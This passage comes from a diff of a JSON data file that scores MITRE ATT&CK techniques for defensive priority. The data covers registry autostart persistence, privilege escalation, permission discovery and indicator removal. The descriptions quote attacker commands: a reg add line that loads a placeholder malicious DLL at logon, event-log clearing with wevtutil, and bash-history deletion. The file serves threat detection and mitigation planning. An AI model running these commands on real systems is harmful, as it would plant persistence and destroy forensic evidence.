CheckPoint Dok)(Citation: objsee netwire backdoor 2019)",
+                "detection": "All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.\n\nOtherwise, login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)\n\nMonitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.",
+                "mitigations": []
             }
         ],
-        "cumulative_score": 2.914285714285714,
-        "adjusted_score": 2.914285714285714,
-        "has_car": true,
+        "mitigations": [],
+        "cumulative_score": 0.9894025085714285,
+        "adjusted_score": 0.9894025085714285,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
-        "cis_controls": [
-            "2.3",
-            "2.5",
-            "2.7",
-            "4.1",
-            "4.7",
-            "4.8",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "9.3",
-            "9.6",
-            "9.7",
-            "10.1",
-            "10.2",
-            "10.7",
-            "13.2",
-            "13.7",
-            "18.3",
-            "18.5",
-            "16.10"
-        ],
-        "nist_controls": [
-            "AC-17",
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CA-7",
-            "CA-8",
-            "CM-11",
-            "CM-2",
-            "CM-5",
-            "CM-6",
-            "CM-7",
-            "CM-8",
-            "IA-2",
-            "IA-8",
-            "IA-9",
-            "RA-5",
-            "SC-18",
-            "SI-10",
-            "SI-16",
-            "SI-2",
-            "SI-3",
-            "SI-4",
-            "SI-7"
-        ],
+        "cis_controls": [],
+        "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
+        "hardware_coverage": true,
         "actionability_score": {
-            "combined_score": 0.9142857142857143,
-            "mitigation_score": 0.8363636363636363,
-            "detection_score": 1
+            "combined_score": 0.22857142857142856,
+            "mitigation_score": 0.01818181818181818,
+            "detection_score": 0.46
         },
-        "choke_point_score": 1,
-        "prevalence_score": 1
+        "choke_point_score": 0.44999999999999996,
+        "prevalence_score": 0.31083108
     },
     {
-        "tid": "T1068",
-        "name": "Exploitation for Privilege Escalation",
-        "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\n\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\n\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).",
-        "url": "https://attack.mitre.org/techniques/T1068",
+        "tid": "T1547.001",
+        "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder",
+        "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",
+        "url": "https://attack.mitre.org/techniques/T1547/001",
         "tactics": [
+            "Persistence",
             "Privilege Escalation"
         ],
-        "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)\n\nHigher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.",
+        "detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
         "platforms": [
-            "Containers",
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Driver: Driver Load"
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.319047619047619,
+        "adjusted_score": 0.319047619047619,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1547.002",
+        "name": "Boot or Logon Autostart Execution: Authentication Package",
+        "description": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)\n\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.",
+        "url": "https://attack.mitre.org/techniques/T1547/002",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1048",
-                "name": "Application Isolation and Sandboxing",
-                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                "url": "https://attack.mitre.org/mitigations/M1048"
-            },
-            {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
-            },
-            {
-                "mid": "M1050",
-                "name": "Exploit Protection",
-                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                "url": "https://attack.mitre.org/mitigations/M1050"
-            },
-            {
-                "mid": "M1019",
-                "name": "Threat Intelligence Program",
-                "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.",
-                "url": "https://attack.mitre.org/mitigations/M1019"
-            },
-            {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
+                "mid": "M1025",
+                "name": "Privileged Process Integrity",
+                "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
+                "url": "https://attack.mitre.org/mitigations/M1025"
             }
         ],
-        "cumulative_score": 0.9236483914285714,
-        "adjusted_score": 0.9236483914285714,
-        "has_car": true,
+        "cumulative_score": 0.18095238095238095,
+        "adjusted_score": 0.18095238095238095,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.4",
-            "7.5",
-            "10.5",
-            "18.3",
-            "18.5"
+            "2.6",
+            "4.1"
         ],
         "nist_controls": [
-            "AC-2",
-            "AC-4",
-            "AC-6",
-            "CA-7",
-            "CA-8",
-            "CM-2",
             "CM-6",
-            "CM-7",
-            "CM-8",
-            "RA-10",
-            "RA-5",
-            "SC-18",
-            "SC-2",
-            "SC-26",
-            "SC-29",
-            "SC-3",
-            "SC-30",
-            "SC-35",
-            "SC-39",
-            "SC-7",
-            "SI-2",
+            "SC-39",
             "SI-3",
             "SI-4",
-            "SI-5",
             "SI-7"
         ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.5714285714285714,
-            "mitigation_score": 0.6,
-            "detection_score": 0.54
-        },
-        "choke_point_score": 0.35,
-        "prevalence_score": 0.00221982
+        "hardware_coverage": false
     },
     {
-        "tid": "T1069",
-        "name": "Permission Groups Discovery",
-        "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
-        "url": "https://attack.mitre.org/techniques/T1069",
+        "tid": "T1547.003",
+        "name": "Boot or Logon Autostart Execution: Time Providers",
+        "description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)",
+        "url": "https://attack.mitre.org/techniques/T1547/003",
         "tactics": [
-            "Discovery"
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)",
+        "detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)",
         "platforms": [
-            "Azure AD",
-            "Containers",
-            "Google Workspace",
-            "IaaS",
-            "Linux",
-            "Office 365",
-            "SaaS",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
             "Command: Command Execution",
-            "Group: Group Enumeration",
-            "Group: Group Metadata",
-            "Pod: Pod Metadata",
-            "Process: Process Creation"
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1069.001",
-                "name": "Permission Groups Discovery: Local Groups",
-                "url": "https://attack.mitre.org/techniques/T1069/001",
-                "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on macOS, and groups on Linux can list local groups.",
-                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
-                "mitigations": []
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1069.002",
-                "name": "Permission Groups Discovery: Domain Groups",
-                "url": "https://attack.mitre.org/techniques/T1069/002",
-                "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n\nCommands such as net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility,  dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.",
-                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
-                "mitigations": []
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             },
             {
-                "tid": "T1069.003",
-                "name": "Permission Groups Discovery: Cloud Groups",
-                "url": "https://attack.mitre.org/techniques/T1069/003",
-                "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.",
-                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.",
-                "mitigations": []
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
             }
         ],
-        "mitigations": [],
-        "cumulative_score": 0.26976355761904763,
-        "adjusted_score": 0.26976355761904763,
+        "cumulative_score": 0.2666666666666667,
+        "adjusted_score": 0.2666666666666667,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
+        "cis_controls": [
+            "3.3",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-3",
+            "AC-4",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "SI-4",
+            "SI-7"
+        ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.14761904761904762,
-            "detection_score": 0.31
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.02214451
+        "hardware_coverage": false
     },
     {
-        "tid": "T1070",
-        "name": "Indicator Removal on Host",
-        "description": "Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*.\n\nThese actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.",
-        "url": "https://attack.mitre.org/techniques/T1070",
+        "tid": "T1547.004",
+        "name": "Boot or Logon Autostart Execution: Winlogon Helper DLL",
+        "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.",
+        "url": "https://attack.mitre.org/techniques/T1547/004",
         "tactics": [
-            "Defense Evasion"
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.",
+        "detection": "Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
         "platforms": [
-            "Containers",
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Deletion",
-            "File: File Metadata",
-            "File: File Modification",
-            "Network Traffic: Network Traffic Content",
-            "Process: OS API Execution",
-            "Process: Process Creation",
-            "User Account: User Account Authentication",
-            "Windows Registry: Windows Registry Key Deletion",
+            "Module: Module Load",
             "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1070.001",
-                "name": "Indicator Removal on Host: Clear Windows Event Logs",
-                "url": "https://attack.mitre.org/techniques/T1070/001",
-                "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
-                "detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").",
-                "mitigations": [
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1029",
-                        "name": "Remote Data Storage",
-                        "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
-                        "url": "https://attack.mitre.org/mitigations/M1029"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1070.002",
-                "name": "Indicator Removal on Host: Clear Linux or Mac System Logs",
-                "url": "https://attack.mitre.org/techniques/T1070/002",
-                "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* /var/log/messages:: General and system-related messages\n* /var/log/secure or /var/log/auth.log: Authentication logs\n* /var/log/utmp or /var/log/wtmp: Login records\n* /var/log/kern.log: Kernel logs\n* /var/log/cron.log: Crond logs\n* /var/log/maillog: Mail server logs\n* /var/log/httpd/: Web server access and error logs\n",
-                "detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.",
-                "mitigations": [
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1029",
-                        "name": "Remote Data Storage",
-                        "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
-                        "url": "https://attack.mitre.org/mitigations/M1029"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1070.003",
-                "name": "Indicator Removal on Host: Clear Command History",
-                "url": "https://attack.mitre.org/techniques/T1070/003",
-                "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)",
-                "detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.\n\nMonitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.",
-                "mitigations": [
-                    {
-                        "mid": "M1039",
-                        "name": "Environment Variable Permissions",
-                        "description": "Prevent modification of environment variables by unauthorized users and groups.",
-                        "url": "https://attack.mitre.org/mitigations/M1039"
-                    },
